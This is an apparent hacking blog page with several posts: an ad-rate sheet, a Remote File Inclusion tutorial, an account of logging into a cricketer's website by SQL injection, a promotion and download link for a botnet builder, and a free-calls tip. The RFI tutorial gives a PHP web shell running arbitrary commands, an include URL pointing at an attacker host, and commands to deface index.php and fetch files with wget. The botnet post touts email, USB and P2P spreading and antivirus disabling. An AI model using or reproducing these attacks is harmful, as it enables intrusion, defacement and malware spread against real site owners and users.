Prohack Advertising Rates Slashed – Reach to a wider audience !!!

Prohack, your favorite technology blog has expanded a lot in quite a short span of time and is celebrating in unison its ascent with you guys :)  Prohack is all ears to advertising of relevant technology websites and has slashed its advertising rates to give you a bigger scoop of benefits. Currently, Prohack supports advertising in following formats and all prices are negotiable in nature -

• Top Slot - The top slot catches everybody's eye and always remains at the apex at rock bottom cost.The top slot to the right of header (ad size - 468 X 60 Full Banner, No Flash) for 33$ per month, 15$per week , 165$ per year (less than 14$ per month!!!) and 320$ for 2 years (less than 14$ per month !!!)

• Repeating Slot - Gives you the maximum exposure on Prohack, this is the most recommended ad slot on Prohack,the slot is available after each post (both in random and expanded view,ad size - 468 X 60, No Flash) 35$ per month,20$ per week,170$ per year ( ~about 14$ per month !! ) and 335$ (less than 14$ per month !! ) for 2 years.

 

• Sidebar Slot- This is where you have ample opportunity to drive your visitors :) 30$ per month (Nofollow),33$ for dofollow, 135$ per year ( about 12$ per month !!!).

• Text Links on sidebar - 20$ per month (Nofollow),23$ for dofollow, 150$ per year (less than 13$ per month). Dofollow link Prices 160$ per year (less than 14$ per month) .

• Twitter tweets - 10$ for 3 tweets in 1 month.Bonus : add Facebook rants for 20$ per month for 3 twitter tweets and 3 facebook rants !!

• Article Text links - Text link " Dofollow "Ads will be included in the starting,mid or bottom of a relevant article,as the article will not be deleted except in exceptional circumstances,those links will be yours forever and will improve your Google rankings. Only one ad per article is allowed and costs 20$ per article with few words to define your self. For eg -

  Build your links with the best on the web. Visit XYZ.COM

• Article advertising - I will be writing an 800-1000 word article about your website/company/enterprise which will include exclusive advertising.The featured article will be for visible for a period of 2 weeks to 1 month on the website front page providing ample view for readers to feed out on your offerings. The gives your review maximum exposure to PROHACK readers. I will be permitting 1 image for a logo and at max 2 images for your agenda. You have to provide me the main theme and the do's and dont's for your firm/enterprise/company/website. 50$ per article is the standard price.

Payments must be done Via PAYPAL in advance, plus, if you have competitors, as an added extra bonus on subscribing the yearly scheme of advertising, we will remove 2 of your competitor websites from our Google Adsense and block them off, so you can enjoy full attention of our followers :)
You are free to choose your advertising scheme and negotiate accordingly.

So ?!! What are you waiting for ? Speak to your audience :) you can contact me at admin[at]theprohack.com

 

Like This post ?  You can buy me a Beer :)

Posted by XERO. ALL RIGHTS RESERVED.

»»  read more

A simple tutorial on Remote File Inclusion (RFI)

RFI stands for Remote File Inclusion, and it allows the attacker to upload a custom coded/malicious file on a website or server using a script. The vulnerability  exploit the poor validation checks in websites and can eventually lead to code execution on server or code execution on website (XSS attack using javascript). This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of tutorial, i suppose you will know what it is all about and may be able to deploy an attack or two.

RFI is a common vulnerability, and trust me all website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and do almost anything (including gagging them out or beg..well that's an exaggeration but I guess you get the idea :P ) . What makes it more dangerous is that you only need to have your common sense and basic knowledge of PHP to execute this one, some BASH might come handy as most of servers today are hosted on Linux..

Okay..Lets start..The first step is to find vulnerable site..you can easily find them using Google dorks..If you don't have any idea, you might want to read about advanced password hacking using Google dorks or to use automated tool to apply Google dorks using Google. Now lets assume we have found a vulnerable website

http://victimsite.com/index.php?page=home

As you can see, this website pulls documents stored in text format from server and renders them as web pages. We can find ways around it as it uses PHP include function to pull them out..check it out.

http://victimsite.com/index.php?page=http://hackersite.com/evilscript.txt

I have included a custom script “eveilscript” in text format from my website, which contains some code..Now..if its a vulnerable website, then 3 cases happen -

• Case 1 - You might have noticed that the url consisted of “”page=home” had no extension, but I have included an extension in my url,hence the site may give an error like “failure to include evilscript.txt.txt”, this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
• Case 2 - In case, it automatically appends something in the lines of .php then we have to use a null byte “%00” in order to avoid error.
• Case 3 – successfull execution :)

Now once you have battled around this one, you might want to learn what to code inside the script. You may get a custom coded infamous C99 script (too bloaty but highly effective once deployed) or you might code yourself a new one. For this knowledge of PHP might come in handy. Here we go

<?php

echo "<script>alert(U 4r3 0wn3d !!);</script>";
echo "Run command: ".htmlspecialchars($_GET['cmd']);

system($_GET['cmd']);

?>

The above code allows you to exploit include function and tests if the site if RFI (XSS) vulnerable by running the alert box code and if successful, you can send custom commands to the linux server in bash. So…If you are in luck and if it worked, lets try our hands on some Linux commands. For example to find the current working directory of server and then to list files, we will be using “pwd” and “ls” commands.

http//victimsite.com/index.php?cmd=pwd&page=http://hackersite.com/ourscript

http//victimsite.com/index.php?cmd=ls&page=http://hackersite.com/ourscript

What it does is that it sends the command as cmd we put in our script, and begins print the working directory and list the documents..Even better..you can almost make the page proclaim that you hacked it by using the “echo” command..

cmd=echo U r pwn3d by xero> index.php

It will then re-write the index.php and render it..In case,its a primitive website which stores pages with .txt extension, you might want to put it with along the .txt files.Now..as expected..We are now the alpha and the omega of the website :) we can download, remove, rename, anything! Want to download stuff ? try the “wget” function (cmd=wget.. get the idea..)..Want to move it out ? “mv”..

I leave the rest on your creativity..

 

Like This post ?  You can buy me a Beer :)

Posted by XERO. ALL RIGHTS RESERVED.

»»  read more

M S Dhoni Website hacked – Mahi’s site Vulnerable to SQL injections

Well..it seems as Mr Dhoni prepares himself for his wedding, in the mean time, his website is found to be quite vulnerable to SQL injections. The website created   in Microsoft .net is an easy bait to compromise when it comes to sql injections. I earlier blogged about hackable government and educational websites and emphasized on how computer security is virtually nil from Indian web scenario. And the thing keeps on going.I tried to contact the website creators, but their own website was down at the moment. sheesh..

Disclaimer -

I HAVE NOT HACKED ANY OF THE SITES AND THE DATABASE,JUST TESTED THEM FOR VULNERABILITIES. I TESTED THEM AND FOUND ERRORS WHICH MAY/MAY NOT BE DISCLOSED HERE AND IN NO WAY ANY ONE CAN SUE ME FOR THIS AS I DID AND MEANT NO HARM TO THE DATA OF CONCERNED ORGANIZATIONS.BY READING THIS ARTICLE YOU AGREE WITH THE DISCLAIMER.

IF YOU AGREE WITH THIS AGREEMENT,CONTINUE READING ELSE IMMEDIATELY LEAVE THIS WEBSITE.

Here you go

I opened up Ms Dhoni’s Website

 

Got into the login panel

inserted a sample SQL query to check if .NET debugging was enabled or not, and by God it was enabled. What in the God’s name were they thinking ?

Inserted a simple SQL string and was logged in as “tushar31128” . Easy as pie.. and I didnt even probed for more than 3 minutes. sheesh..

I later tried to contact the devs to solve the vulnerability but..

It seems..they are down too…

What I want to prove here is not that its easily hackable..I want to prove that Any person with far better capabilities than mine can trash the website. I didnt even gained access to admin panel (never tried for it) but I guess I m able to prove my point. I guess Mr Dhoni will go for an overhaul of the website once he is back. I m an eager fan of the renowned cricketer anyways.

 

See you next mission.

Like This post ?  You can buy me a Beer :)

Posted by XERO. ALL RIGHTS RESERVED.

»»  read more

Project Blackout v2.5 – Botnets Anyone ?

As defined by wikipedia,a botnet is a jargon term for a collection of software agents, or robots, that run autonomously and automatically,in laymans’ term, its like  a zombie master controlling all other zombies for his whims and fancies. Since their inception, botnets are the prime threat to the consumer security scene due to their anonymity, easy to use and readily available software to create them and if needed, anonymous hosting services are available at low prices.

On the flip side, if ever you wanted to create your botnet, Project Blackout V2.5 is the tool to go (I would recommend you to code your own tools and botnet spreaders if you are serious, but in case you are that proficient..or you are a plain lazy bastard, blackout is the way to go.. ) made to spread your botnet, but it works on every .exe on the internet. Some sample features -

• Keyloggers, RATS, Crypted, binded files and much,much, more!
• Add to startup - Now working in XP, Vista and 7 32-bit and 64-bit! also supports automatic download and execution of your bot on startup or application run.
• Mass Email Spread (This is why gmail username and password is required)
• can infects all HTML documents
• Antiviruses -New antiviruses, improved antiviruses are supported.Secure your server from all the newest antiviruses and sniffers,also victims will no longer be able to update their antivirus once ran
• Email,Skype,MSN Spread - Sends message to all online contacts getting them to download and run your virus
• LAN Spread – Pretty obvious and amazing :)
• Encryption - Secure your server and the entered info using encryption
• P2P Spread - Limewire, eDonkey and much, much more. When you have over 100+ bots all hosting your virus on limewire you will be getting a truckload of zombies
• USB Spread - Its your basic, everyday, 100% working and stable USB auto-spread.
• Unique mutex - This way your bot is unique, and other bots do not copy over yours

PS: if it says the version expired on 18.5.2010, then set your system date back and it will run easily.

 Disclaimer – I am not responsible for anykind of misuse of this software, just get it straight!

You can download it from here

Download Project Blackout

 

Like This post ?  You can buy me a Beer :)

Posted by XERO. ALL RIGHTS RESERVED.

»»  read more

Free 90 + minutes of call anywhere in the world

Folks..recently I stumbled across this website that allows you to make 90+ minutes of free calls anywhere in the world. I have tested it and its working,the catch  is that it allows only one sim per user registration (quite obvious). Guess the outbreak of SIP based connections,easy availability of switchvox and cheap leased line connections have made everyone going to setup their own calling gateways. The one provided below is a better one as compared to others as the setup is easy and calling minutes are quite enough :) If you want to try them out, just read on..

Go to Betterconferencing and Sign up there.

Once you have signed up, you will get a call. Please note down the pin number.

Once you have got the pin number and authenticated your mobile number, you can login at Betterconferencing and start using their service.

Enjoy :)

 

Like This post ?  You can buy me a Beer :)

Posted by XERO. ALL RIGHTS RESERVED.

»»  read more